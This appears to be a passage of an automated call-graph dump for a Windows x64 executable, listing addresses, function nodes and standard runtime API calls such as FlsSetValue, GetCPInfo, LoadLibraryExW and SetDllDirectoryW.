Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19045->19048 19046 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19046->19034 19049 7ff7c26793fa 19047->19049 19048->19045 19051 7ff7c267b2a5 FlsGetValue 19050->19051 19052 7ff7c267b2c0 FlsSetValue 19050->19052 19054 7ff7c267b2b2 19051->19054 19055 7ff7c267b2ba 19051->19055 19053 7ff7c267b2cd 19052->19053 19052->19054 19057 7ff7c267ec08 memcpy_s 11 API calls 19053->19057 19056 7ff7c267a574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19054->19056 19058 7ff7c267b2b8 19054->19058 19055->19052 19059 7ff7c267b335 19056->19059 19060 7ff7c267b2dc 19057->19060 19070 7ff7c2682334 19058->19070 19061 7ff7c267b2fa FlsSetValue 19060->19061 19062 7ff7c267b2ea FlsSetValue 19060->19062 19064 7ff7c267b318 19061->19064 19065 7ff7c267b306 FlsSetValue 19061->19065 19063 7ff7c267b2f3 19062->19063 19066 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19063->19066 19067 7ff7c267af64 memcpy_s 11 API calls 19064->19067 19065->19063 19066->19054 19068 7ff7c267b320 19067->19068 19069 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19068->19069 19069->19058 19093 7ff7c26825a4 19070->19093 19072 7ff7c2682369 19108 7ff7c2682034 19072->19108 19075 7ff7c267d66c _fread_nolock 12 API calls 19076 7ff7c2682397 19075->19076 19077 7ff7c268239f 19076->19077 19080 7ff7c26823ae 19076->19080 19078 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19077->19078 19079 7ff7c2682386 19078->19079 19079->19007 19115 7ff7c26826dc 19080->19115 19083 7ff7c26824aa 19084 7ff7c2674f78 memcpy_s 11 API calls 19083->19084 19085 7ff7c26824af 19084->19085 19087 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19085->19087 19086 7ff7c2682505 19089 7ff7c268256c 19086->19089 19126 7ff7c2681e64 19086->19126 19087->19079 19088 7ff7c26824c4 19088->19086 19091 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API 
calls 19088->19091 19090 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19089->19090 19090->19079 19091->19086 19094 7ff7c26825c7 19093->19094 19096 7ff7c26825d1 19094->19096 19141 7ff7c2680348 EnterCriticalSection 19094->19141 19097 7ff7c2682643 19096->19097 19100 7ff7c267a574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19096->19100 19097->19072 19102 7ff7c268265b 19100->19102 19104 7ff7c26826b2 19102->19104 19105 7ff7c267b294 50 API calls 19102->19105 19104->19072 19106 7ff7c268269c 19105->19106 19107 7ff7c2682334 65 API calls 19106->19107 19107->19104 19109 7ff7c2674fbc 45 API calls 19108->19109 19110 7ff7c2682048 19109->19110 19111 7ff7c2682066 19110->19111 19112 7ff7c2682054 GetOEMCP 19110->19112 19113 7ff7c268206b GetACP 19111->19113 19114 7ff7c268207b 19111->19114 19112->19114 19113->19114 19114->19075 19114->19079 19116 7ff7c2682034 47 API calls 19115->19116 19117 7ff7c2682709 19116->19117 19118 7ff7c268285f 19117->19118 19120 7ff7c2682746 IsValidCodePage 19117->19120 19124 7ff7c2682760 memcpy_s 19117->19124 19119 7ff7c266c5c0 _log10_special 8 API calls 19118->19119 19121 7ff7c26824a1 19119->19121 19120->19118 19122 7ff7c2682757 19120->19122 19121->19083 19121->19088 19123 7ff7c2682786 GetCPInfo 19122->19123 19122->19124 19123->19118 19123->19124 19142 7ff7c268214c 19124->19142 19208 7ff7c2680348 EnterCriticalSection 19126->19208 19143 7ff7c2682189 GetCPInfo 19142->19143 19152 7ff7c268227f 19142->19152 19148 7ff7c268219c 19143->19148 19143->19152 19144 7ff7c266c5c0 _log10_special 8 API calls 19146 7ff7c268231e 19144->19146 19145 7ff7c2682eb0 48 API calls 19147 7ff7c2682213 19145->19147 19146->19118 19153 7ff7c2687bf4 19147->19153 19148->19145 19151 7ff7c2687bf4 54 API calls 19151->19152 19152->19144 19154 7ff7c2674fbc 45 API calls 19153->19154 19155 7ff7c2687c19 19154->19155 19158 7ff7c26878c0 19155->19158 19159 7ff7c2687901 19158->19159 19160 7ff7c267f910 _fread_nolock MultiByteToWideChar 19159->19160 19163 
7ff7c268794b 19160->19163 19161 7ff7c2687bc9 19162 7ff7c266c5c0 _log10_special 8 API calls 19161->19162 19164 7ff7c2682246 19162->19164 19163->19161 19165 7ff7c267d66c _fread_nolock 12 API calls 19163->19165 19166 7ff7c2687a81 19163->19166 19168 7ff7c2687983 19163->19168 19164->19151 19165->19168 19166->19161 19167 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19166->19167 19167->19161 19168->19166 19169 7ff7c267f910 _fread_nolock MultiByteToWideChar 19168->19169 19170 7ff7c26879f6 19169->19170 19170->19166 19189 7ff7c267f154 19170->19189 19173 7ff7c2687a92 19175 7ff7c267d66c _fread_nolock 12 API calls 19173->19175 19177 7ff7c2687b64 19173->19177 19178 7ff7c2687ab0 19173->19178 19174 7ff7c2687a41 19174->19166 19176 7ff7c267f154 __crtLCMapStringW 6 API calls 19174->19176 19175->19178 19176->19166 19177->19166 19179 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19177->19179 19178->19166 19180 7ff7c267f154 __crtLCMapStringW 6 API calls 19178->19180 19179->19166 19181 7ff7c2687b30 19180->19181 19181->19177 19182 7ff7c2687b66 19181->19182 19183 7ff7c2687b50 19181->19183 19184 7ff7c2680858 WideCharToMultiByte 19182->19184 19185 7ff7c2680858 WideCharToMultiByte 19183->19185 19186 7ff7c2687b5e 19184->19186 19185->19186 19186->19177 19187 7ff7c2687b7e 19186->19187 19187->19166 19188 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19187->19188 19188->19166 19195 7ff7c267ed80 19189->19195 19193 7ff7c267f203 LCMapStringW 19194 7ff7c267f19a 19193->19194 19194->19166 19194->19173 19194->19174 19196 7ff7c267eddd 19195->19196 19203 7ff7c267edd8 __vcrt_FlsAlloc 19195->19203 19196->19194 19205 7ff7c267f240 19196->19205 19197 7ff7c267ee0d LoadLibraryExW 19199 7ff7c267eee2 19197->19199 19200 7ff7c267ee32 GetLastError 19197->19200 19198 7ff7c267ef02 GetProcAddress 19198->19196 19202 7ff7c267ef13 19198->19202 19199->19198 19201 7ff7c267eef9 FreeLibrary 19199->19201 19200->19203 19201->19198 19202->19196 
19203->19196 19203->19197 19203->19198 19204 7ff7c267ee6c LoadLibraryExW 19203->19204 19204->19199 19204->19203 19206 7ff7c267ed80 __crtLCMapStringW 5 API calls 19205->19206 19207 7ff7c267f26e __crtLCMapStringW 19206->19207 19207->19193 19213 7ff7c267951d 19209->19213 19214 7ff7c26793b9 19209->19214 19210 7ff7c2679546 19212 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19210->19212 19211 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19211->19213 19212->19214 19213->19210 19213->19211 19214->19046 19216 7ff7c2686348 19215->19216 19217 7ff7c2686331 19215->19217 19216->19217 19220 7ff7c2686356 19216->19220 19218 7ff7c2674f78 memcpy_s 11 API calls 19217->19218 19219 7ff7c2686336 19218->19219 19222 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 19219->19222 19221 7ff7c2686341 19220->19221 19223 7ff7c2674fbc 45 API calls 19220->19223 19221->18882 19222->19221 19223->19221 19225 7ff7c2674fbc 45 API calls 19224->19225 19226 7ff7c2688fe1 19225->19226 19229 7ff7c2688c38 19226->19229 19232 7ff7c2688c86 19229->19232 19230 7ff7c266c5c0 _log10_special 8 API calls 19231 7ff7c2687275 19230->19231 19231->18882 19231->18908 19233 7ff7c2688d0d 19232->19233 19235 7ff7c2688cf8 GetCPInfo 19232->19235 19238 7ff7c2688d11 19232->19238 19234 7ff7c267f910 _fread_nolock MultiByteToWideChar 19233->19234 19233->19238 19236 7ff7c2688da5 19234->19236 19235->19233 19235->19238 19237 7ff7c267d66c _fread_nolock 12 API calls 19236->19237 19236->19238 19239 7ff7c2688ddc 19236->19239 19237->19239 19238->19230 19239->19238 19240 7ff7c267f910 _fread_nolock MultiByteToWideChar 19239->19240 19241 7ff7c2688e4a 19240->19241 19242 7ff7c2688f2c 19241->19242 19243 7ff7c267f910 _fread_nolock MultiByteToWideChar 19241->19243 19242->19238 19244 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19242->19244 19245 7ff7c2688e70 19243->19245 19244->19238 19245->19242 19246 7ff7c267d66c _fread_nolock 12 API calls 19245->19246 19247 
7ff7c2688e9d 19245->19247 19246->19247 19247->19242 19248 7ff7c267f910 _fread_nolock MultiByteToWideChar 19247->19248 19249 7ff7c2688f14 19248->19249 19250 7ff7c2688f34 19249->19250 19251 7ff7c2688f1a 19249->19251 19258 7ff7c267efd8 19250->19258 19251->19242 19253 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19251->19253 19253->19242 19255 7ff7c2688f73 19255->19238 19257 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19255->19257 19256 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19256->19255 19257->19238 19259 7ff7c267ed80 __crtLCMapStringW 5 API calls 19258->19259 19261 7ff7c267f016 19259->19261 19260 7ff7c267f01e 19260->19255 19260->19256 19261->19260 19262 7ff7c267f240 __crtLCMapStringW 5 API calls 19261->19262 19263 7ff7c267f087 CompareStringW 19262->19263 19263->19260 19265 7ff7c2687cca HeapSize 19264->19265 19266 7ff7c2687cb1 19264->19266 19267 7ff7c2674f78 memcpy_s 11 API calls 19266->19267 19268 7ff7c2687cb6 19267->19268 19269 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 19268->19269 19270 7ff7c2687cc1 19269->19270 19270->18913 19272 7ff7c2687cf9 19271->19272 19273 7ff7c2687d03 19271->19273 19275 7ff7c267d66c _fread_nolock 12 API calls 19272->19275 19274 7ff7c2687d08 19273->19274 19282 7ff7c2687d0f memcpy_s 19273->19282 19277 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19274->19277 19276 7ff7c2687d01 19275->19276 19276->18917 19277->19276 19278 7ff7c2687d15 19280 7ff7c2674f78 memcpy_s 11 API calls 19278->19280 19279 7ff7c2687d42 HeapReAlloc 19279->19276 19279->19282 19280->19276 19281 7ff7c2683600 memcpy_s 2 API calls 19281->19282 19282->19278 19282->19279 19282->19281 19284 7ff7c267ed80 __crtLCMapStringW 5 API calls 19283->19284 19285 7ff7c267efb4 19284->19285 19285->18921 19287 7ff7c267556a 19286->19287 19288 7ff7c2675546 19286->19288 19289 7ff7c26755c4 19287->19289 19290 7ff7c267556f 19287->19290 19292 7ff7c267a9b8 
Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19288->19292 19294 7ff7c2675555 19288->19294 19291 7ff7c267f910 _fread_nolock MultiByteToWideChar 19289->19291 19290->19294 19295 7ff7c2675584 19290->19295 19297 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19290->19297 19293 7ff7c26755e0 19291->19293 19292->19294 19296 7ff7c26755e7 GetLastError 19293->19296 19302 7ff7c2675615 19293->19302 19305 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19293->19305 19307 7ff7c2675622 19293->19307 19294->18925 19294->18926 19298 7ff7c267d66c _fread_nolock 12 API calls 19295->19298 19299 7ff7c2674eec _fread_nolock 11 API calls 19296->19299 19297->19295 19298->19294 19301 7ff7c26755f4 19299->19301 19300 7ff7c267f910 _fread_nolock MultiByteToWideChar 19303 7ff7c2675666 19300->19303 19304 7ff7c2674f78 memcpy_s 11 API calls 19301->19304 19306 7ff7c267d66c _fread_nolock 12 API calls 19302->19306 19303->19294 19303->19296 19304->19294 19305->19302 19306->19307 19307->19294 19307->19300 19309 7ff7c2679295 19308->19309 19310 7ff7c2679291 19308->19310 19329 7ff7c2682aac GetEnvironmentStringsW 19309->19329 19310->18955 19321 7ff7c267963c 19310->19321 19313 7ff7c26792ae 19336 7ff7c26793fc 19313->19336 19314 7ff7c26792a2 19315 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19314->19315 19315->19310 19318 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19319 7ff7c26792d5 19318->19319 19320 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19319->19320 19320->19310 19322 7ff7c267965f 19321->19322 19327 7ff7c2679676 19321->19327 19322->18955 19323 7ff7c267ec08 memcpy_s 11 API calls 19323->19327 19324 7ff7c26796ea 19326 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19324->19326 19325 7ff7c267f910 MultiByteToWideChar _fread_nolock 19325->19327 19326->19322 19327->19322 19327->19323 19327->19324 19327->19325 19328 
7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19327->19328 19328->19327 19330 7ff7c267929a 19329->19330 19331 7ff7c2682ad0 19329->19331 19330->19313 19330->19314 19332 7ff7c267d66c _fread_nolock 12 API calls 19331->19332 19334 7ff7c2682b07 memcpy_s 19332->19334 19333 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19335 7ff7c2682b27 FreeEnvironmentStringsW 19333->19335 19334->19333 19335->19330 19337 7ff7c2679424 19336->19337 19338 7ff7c267ec08 memcpy_s 11 API calls 19337->19338 19339 7ff7c267945f 19338->19339 19341 7ff7c26794e1 19339->19341 19344 7ff7c267ec08 memcpy_s 11 API calls 19339->19344 19345 7ff7c26794d0 19339->19345 19346 7ff7c26804e4 37 API calls 19339->19346 19349 7ff7c2679504 19339->19349 19352 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19339->19352 19353 7ff7c2679467 19339->19353 19340 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19343 7ff7c26792b6 19340->19343 19342 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19341->19342 19342->19343 19343->19318 19344->19339 19347 7ff7c2679518 11 API calls 19345->19347 19346->19339 19348 7ff7c26794d8 19347->19348 19350 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19348->19350 19351 7ff7c267a970 _isindst 17 API calls 19349->19351 19350->19353 19354 7ff7c2679516 19351->19354 19352->19339 19353->19340 19356 7ff7c2688ba1 __crtLCMapStringW 19355->19356 19357 7ff7c268715e 19356->19357 19358 7ff7c267efd8 6 API calls 19356->19358 19357->18980 19357->18981 19358->19357 19906 7ff7c2679dc0 19909 7ff7c2679d3c 19906->19909 19916 7ff7c2680348 EnterCriticalSection 19909->19916 20073 7ff7c267b040 20074 7ff7c267b045 20073->20074 20078 7ff7c267b05a 20073->20078 20079 7ff7c267b060 20074->20079 20080 7ff7c267b0a2 20079->20080 20083 7ff7c267b0aa 20079->20083 20081 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20080->20081 
20081->20083 20082 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20084 7ff7c267b0b7 20082->20084 20083->20082 20085 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20084->20085 20086 7ff7c267b0c4 20085->20086 20087 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20086->20087 20088 7ff7c267b0d1 20087->20088 20089 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20088->20089 20090 7ff7c267b0de 20089->20090 20091 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20090->20091 20092 7ff7c267b0eb 20091->20092 20093 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20092->20093 20094 7ff7c267b0f8 20093->20094 20095 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20094->20095 20096 7ff7c267b105 20095->20096 20097 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20096->20097 20098 7ff7c267b115 20097->20098 20099 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20098->20099 20100 7ff7c267b125 20099->20100 20105 7ff7c267af04 20100->20105 20119 7ff7c2680348 EnterCriticalSection 20105->20119 19920 7ff7c266cbc0 19921 7ff7c266cbd0 19920->19921 19937 7ff7c2679c18 19921->19937 19923 7ff7c266cbdc 19943 7ff7c266ceb8 19923->19943 19925 7ff7c266cc49 19926 7ff7c266d19c 7 API calls 19925->19926 19936 7ff7c266cc65 19925->19936 19928 7ff7c266cc75 19926->19928 19927 7ff7c266cbf4 _RTC_Initialize 19927->19925 19948 7ff7c266d068 19927->19948 19930 7ff7c266cc09 19951 7ff7c2679084 19930->19951 19938 7ff7c2679c29 19937->19938 19939 7ff7c2674f78 memcpy_s 11 API calls 19938->19939 19942 7ff7c2679c31 19938->19942 19940 7ff7c2679c40 19939->19940 19941 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 19940->19941 19941->19942 19942->19923 19944 7ff7c266cec9 19943->19944 19947 7ff7c266cece __scrt_acquire_startup_lock 19943->19947 19945 7ff7c266d19c 7 API calls 
19944->19945 19944->19947 19946 7ff7c266cf42 19945->19946 19947->19927 19976 7ff7c266d02c 19948->19976 19950 7ff7c266d071 19950->19930 19952 7ff7c26790a4 19951->19952 19966 7ff7c266cc15 19951->19966 19953 7ff7c26790ac 19952->19953 19954 7ff7c26790c2 GetModuleFileNameW 19952->19954 19955 7ff7c2674f78 memcpy_s 11 API calls 19953->19955 19958 7ff7c26790ed 19954->19958 19956 7ff7c26790b1 19955->19956 19957 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 19956->19957 19957->19966 19991 7ff7c2679024 19958->19991 19961 7ff7c2679135 19962 7ff7c2674f78 memcpy_s 11 API calls 19961->19962 19963 7ff7c267913a 19962->19963 19964 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19963->19964 19964->19966 19965 7ff7c267914d 19968 7ff7c267919b 19965->19968 19969 7ff7c26791b4 19965->19969 19974 7ff7c267916f 19965->19974 19966->19925 19975 7ff7c266d13c InitializeSListHead 19966->19975 19967 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19967->19966 19970 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19968->19970 19972 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19969->19972 19971 7ff7c26791a4 19970->19971 19973 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19971->19973 19972->19974 19973->19966 19974->19967 19977 7ff7c266d046 19976->19977 19979 7ff7c266d03f 19976->19979 19980 7ff7c267a25c 19977->19980 19979->19950 19983 7ff7c2679e98 19980->19983 19990 7ff7c2680348 EnterCriticalSection 19983->19990 19992 7ff7c267903c 19991->19992 19996 7ff7c2679074 19991->19996 19993 7ff7c267ec08 memcpy_s 11 API calls 19992->19993 19992->19996 19994 7ff7c267906a 19993->19994 19995 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19994->19995 19995->19996 19996->19961 19996->19965 15918 7ff7c266ccac 15939 7ff7c266ce7c 15918->15939 15921 7ff7c266cdf8 16093 7ff7c266d19c IsProcessorFeaturePresent 15921->16093 15922 7ff7c266ccc8 
__scrt_acquire_startup_lock 15924 7ff7c266ce02 15922->15924 15929 7ff7c266cce6 __scrt_release_startup_lock 15922->15929 15925 7ff7c266d19c 7 API calls 15924->15925 15927 7ff7c266ce0d __FrameHandler3::FrameUnwindToEmptyState 15925->15927 15926 7ff7c266cd0b 15928 7ff7c266cd91 15945 7ff7c266d2e4 15928->15945 15929->15926 15929->15928 16082 7ff7c2679b9c 15929->16082 15931 7ff7c266cd96 15948 7ff7c2661000 15931->15948 15936 7ff7c266cdb9 15936->15927 16089 7ff7c266d000 15936->16089 15940 7ff7c266ce84 15939->15940 15941 7ff7c266ce90 __scrt_dllmain_crt_thread_attach 15940->15941 15942 7ff7c266ce9d 15941->15942 15943 7ff7c266ccc0 15941->15943 15942->15943 16100 7ff7c266d8f8 15942->16100 15943->15921 15943->15922 16127 7ff7c268a540 15945->16127 15949 7ff7c2661009 15948->15949 16129 7ff7c26754f4 15949->16129 15951 7ff7c26637fb 16136 7ff7c26636b0 15951->16136 15957 7ff7c266383c 16303 7ff7c2661c80 15957->16303 15958 7ff7c266391b 16312 7ff7c26645b0 15958->16312 15962 7ff7c266385b 16208 7ff7c2668a20 15962->16208 15965 7ff7c266396a 16335 7ff7c2662710 15965->16335 15967 7ff7c266388e 15975 7ff7c26638bb __std_exception_destroy 15967->15975 16307 7ff7c2668b90 15967->16307 15969 7ff7c266395d 15970 7ff7c2663984 15969->15970 15971 7ff7c2663962 15969->15971 15973 7ff7c2661c80 49 API calls 15970->15973 16331 7ff7c26700bc 15971->16331 15976 7ff7c26639a3 15973->15976 15977 7ff7c2668a20 14 API calls 15975->15977 15984 7ff7c26638de __std_exception_destroy 15975->15984 15981 7ff7c2661950 115 API calls 15976->15981 15977->15984 15978 7ff7c2668b30 40 API calls 15979 7ff7c2663a0b 15978->15979 15980 7ff7c2668b90 40 API calls 15979->15980 15982 7ff7c2663a17 15980->15982 15983 7ff7c26639ce 15981->15983 15985 7ff7c2668b90 40 API calls 15982->15985 15983->15962 15986 7ff7c26639de 15983->15986 15984->15978 15990 7ff7c266390e __std_exception_destroy 15984->15990 15987 7ff7c2663a23 15985->15987 15988 7ff7c2662710 54 API calls 15986->15988 15989 7ff7c2668b90 40 API calls 15987->15989 16030 7ff7c2663808 
__std_exception_destroy 15988->16030 15989->15990 15991 7ff7c2668a20 14 API calls 15990->15991 15992 7ff7c2663a3b 15991->15992 15993 7ff7c2663b2f 15992->15993 15994 7ff7c2663a60 __std_exception_destroy 15992->15994 15995 7ff7c2662710 54 API calls 15993->15995 16007 7ff7c2663aab 15994->16007 16221 7ff7c2668b30 15994->16221 15995->16030 15997 7ff7c2668a20 14 API calls 15998 7ff7c2663bf4 __std_exception_destroy 15997->15998 15999 7ff7c2663c46 15998->15999 16000 7ff7c2663d41 15998->16000 16001 7ff7c2663cd4 15999->16001 16002 7ff7c2663c50 15999->16002 16355 7ff7c26644d0 16000->16355 16005 7ff7c2668a20 14 API calls 16001->16005 16228 7ff7c26690e0 16002->16228 16009 7ff7c2663ce0 16005->16009 16006 7ff7c2663d4f 16010 7ff7c2663d65 16006->16010 16011 7ff7c2663d71 16006->16011 16007->15997 16012 7ff7c2663c61 16009->16012 16015 7ff7c2663ced 16009->16015 16358 7ff7c2664620 16010->16358 16014 7ff7c2661c80 49 API calls 16011->16014 16017 7ff7c2662710 54 API calls 16012->16017 16024 7ff7c2663cc8 __std_exception_destroy 16014->16024 16018 7ff7c2661c80 49 API calls 16015->16018 16017->16030 16021 7ff7c2663d0b 16018->16021 16019 7ff7c2663dc4 16278 7ff7c2669400 16019->16278 16021->16024 16025 7ff7c2663d12 16021->16025 16023 7ff7c2663dd7 SetDllDirectoryW 16029 7ff7c2663e0a 16023->16029 16033 7ff7c2663e5a 16023->16033 16024->16019 16026 7ff7c2663da7 SetDllDirectoryW LoadLibraryExW 16024->16026 16028 7ff7c2662710 54 API calls 16025->16028 16026->16019 16028->16030 16031 7ff7c2668a20 14 API calls 16029->16031 16346 7ff7c266c5c0 16030->16346 16040 7ff7c2663e16 __std_exception_destroy 16031->16040 16032 7ff7c2663ffc 16035 7ff7c2664029 16032->16035 16036 7ff7c2664006 PostMessageW GetMessageW 16032->16036 16033->16032 16034 7ff7c2663f1b 16033->16034 16283 7ff7c26633c0 16034->16283 16435 7ff7c2663360 16035->16435 16036->16035 16043 7ff7c2663ef2 16040->16043 16047 7ff7c2663e4e 16040->16047 16046 7ff7c2668b30 40 API calls 16043->16046 16046->16033 16047->16033 16361 7ff7c2666db0 16047->16361 
16083 7ff7c2679bd4 16082->16083 16084 7ff7c2679bb3 16082->16084 18672 7ff7c267a448 16083->18672 16084->15928 16087 7ff7c266d328 GetModuleHandleW 16088 7ff7c266d339 16087->16088 16088->15936 16090 7ff7c266d011 16089->16090 16091 7ff7c266cdd0 16090->16091 16092 7ff7c266d8f8 7 API calls 16090->16092 16091->15926 16092->16091 16094 7ff7c266d1c2 _isindst memcpy_s 16093->16094 16095 7ff7c266d1e1 RtlCaptureContext RtlLookupFunctionEntry 16094->16095 16096 7ff7c266d20a RtlVirtualUnwind 16095->16096 16097 7ff7c266d246 memcpy_s 16095->16097 16096->16097 16098 7ff7c266d278 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16097->16098 16099 7ff7c266d2c6 _isindst 16098->16099 16099->15924 16101 7ff7c266d90a 16100->16101 16102 7ff7c266d900 16100->16102 16101->15943 16106 7ff7c266dc94 16102->16106 16107 7ff7c266dca3 16106->16107 16108 7ff7c266d905 16106->16108 16114 7ff7c266ded0 16107->16114 16110 7ff7c266dd00 16108->16110 16111 7ff7c266dd2b 16110->16111 16112 7ff7c266dd0e DeleteCriticalSection 16111->16112 16113 7ff7c266dd2f 16111->16113 16112->16111 16113->16101 16118 7ff7c266dd38 16114->16118 16124 7ff7c266de22 TlsFree 16118->16124 16125 7ff7c266dd7c __vcrt_FlsAlloc 16118->16125 16119 7ff7c266ddaa LoadLibraryExW 16121 7ff7c266ddcb GetLastError 16119->16121 16122 7ff7c266de49 16119->16122 16120 7ff7c266de69 GetProcAddress 16120->16124 16121->16125 16122->16120 16123 7ff7c266de60 FreeLibrary 16122->16123 16123->16120 16125->16119 16125->16120 16125->16124 16126 7ff7c266dded LoadLibraryExW 16125->16126 16126->16122 16126->16125 16128 7ff7c266d2fb GetStartupInfoW 16127->16128 16128->15931 16130 7ff7c267f4f0 16129->16130 16132 7ff7c267f596 16130->16132 16133 7ff7c267f543 16130->16133 16458 7ff7c267f3c8 16132->16458 16448 7ff7c267a884 16133->16448 16135 7ff7c267f56c 16135->15951 16565 7ff7c266c8c0 16136->16565 16139 7ff7c26636eb GetLastError 16572 7ff7c2662c50 16139->16572 16140 7ff7c2663710 16567 7ff7c26692f0 FindFirstFileExW 16140->16567 16144 7ff7c266377d 
16598 7ff7c26694b0 16144->16598 16145 7ff7c2663723 16587 7ff7c2669370 CreateFileW 16145->16587 16147 7ff7c266c5c0 _log10_special 8 API calls 16149 7ff7c26637b5 16147->16149 16149->16030 16158 7ff7c2661950 16149->16158 16151 7ff7c2663706 16151->16147 16152 7ff7c266378b 16152->16151 16155 7ff7c2662810 49 API calls 16152->16155 16153 7ff7c266374c __vcrt_FlsAlloc 16153->16144 16154 7ff7c2663734 16590 7ff7c2662810 16154->16590 16155->16151 16159 7ff7c26645b0 108 API calls 16158->16159 16160 7ff7c2661985 16159->16160 16161 7ff7c2661c43 16160->16161 16163 7ff7c2667f80 83 API calls 16160->16163 16162 7ff7c266c5c0 _log10_special 8 API calls 16161->16162 16164 7ff7c2661c5e 16162->16164 16165 7ff7c26619cb 16163->16165 16164->15957 16164->15958 16178 7ff7c2661a03 16165->16178 17003 7ff7c2670744 16165->17003 16167 7ff7c26700bc 74 API calls 16167->16161 16168 7ff7c26619e5 16169 7ff7c2661a08 16168->16169 16170 7ff7c26619e9 16168->16170 17007 7ff7c267040c 16169->17007 16171 7ff7c2674f78 memcpy_s 11 API calls 16170->16171 16173 7ff7c26619ee 16171->16173 17010 7ff7c2662910 16173->17010 16176 7ff7c2661a26 16179 7ff7c2674f78 memcpy_s 11 API calls 16176->16179 16177 7ff7c2661a45 16182 7ff7c2661a5c 16177->16182 16183 7ff7c2661a7b 16177->16183 16178->16167 16180 7ff7c2661a2b 16179->16180 16181 7ff7c2662910 54 API calls 16180->16181 16181->16178 16184 7ff7c2674f78 memcpy_s 11 API calls 16182->16184 16185 7ff7c2661c80 49 API calls 16183->16185 16186 7ff7c2661a61 16184->16186 16187 7ff7c2661a92 16185->16187 16188 7ff7c2662910 54 API calls 16186->16188 16189 7ff7c2661c80 49 API calls 16187->16189 16188->16178 16190 7ff7c2661add 16189->16190 16191 7ff7c2670744 73 API calls 16190->16191 16192 7ff7c2661b01 16191->16192 16193 7ff7c2661b16 16192->16193 16194 7ff7c2661b35 16192->16194 16196 7ff7c2674f78 memcpy_s 11 API calls 16193->16196 16195 7ff7c267040c _fread_nolock 53 API calls 16194->16195 16197 7ff7c2661b4a 16195->16197 16198 7ff7c2661b1b 16196->16198 16200 7ff7c2661b50 16197->16200 16201 
